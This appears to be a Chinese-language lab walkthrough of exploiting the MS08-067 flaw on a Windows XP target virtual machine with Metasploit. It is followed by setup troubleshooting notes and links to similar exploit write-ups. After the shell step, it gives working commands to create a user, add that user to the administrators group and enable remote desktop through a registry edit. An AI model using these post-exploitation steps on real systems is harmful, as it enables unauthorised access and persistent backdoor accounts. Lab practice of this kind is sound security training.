ms08-067
1、查找ms08-067:
2、使用:
3、选择payload:(开始我用的windows/shell/...和windows/meterpreter/reverse_tpc有区别)
4、查看options(yes为必填部分):
5、输入RHOST(目标靶机)IP和LHOST的IP:
6、查看适合的系统类型(简体中文sp3,编号34):
7、可选target 0(自动)或自己选择:
8、exploit(图中IP是后来改的,原先是192.168.199.139)(问号是因为中、英文编码不通?所以攻击机命令靶机也无法正常获得执行):
9、获得靶机cmd:shell
10、查看端口打开情况:
11、新建用户: net user 用户名 密码 /add
12、将新用户添加到administation分组(提升到管理员权限):net localgroup administrators 用户名 /add
13、开启3389端口:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
14、局域网内用户都可远程控制此靶机:mstsc
15、问题总结:
首先,靶机的安装遇到了一些难题:windowsxp有的版本已经打过补丁,我尝试过找旧版本和卸载补丁,没成功,百度的方法不适应。最后发现之前安装的xp满足要求,是因为联网的问题导致的失败;
联网问题:NAT模式自动获取IP(开启dhcp服务),桥接模式手动配IP。进行期间断网或者更换联网方式,应当对IP进行查看修改。
还有一个问题,打开的Windows shell不能使用上下左右键
相关阅读
我们可以知道一个个体很详细的真实数据,但是这些数据对于营销有什么具体的帮助呢?本文跟大家讲了一个运用大数据进行营销的新思路。
微软MS12-020漏洞的利用0X00 前言0x01 环境1. 目标机环境2. 攻击机环境3. 拓扑结构0x02 利用过程1. 相互ping通2. 启动Metasploit
1.常见的编辑器常见的有Ewebeditor,fckeditor,ckeditor,kindeditor等等。这里有份编辑器漏洞手册:http://navisec.it/%E7%BC%96%E
使用metasploit(MSF)对windows的ms12-020漏洞进行利用
前言 攻击者向受影响的系统发送一系列特制 RDP 数据包,则这个漏洞可能造成拒绝服务攻击或允许远程执行代码。默认情况下,任何 Wind
【S2-045】 Struts2远程命令执行漏洞(CVE-2017-5638)
实验环境 操作机:Windows XP 目标机:Centos 6.5 Struts版本:2.3.31 请访问http://file.ichunqiu.com/74tk6wy6下载实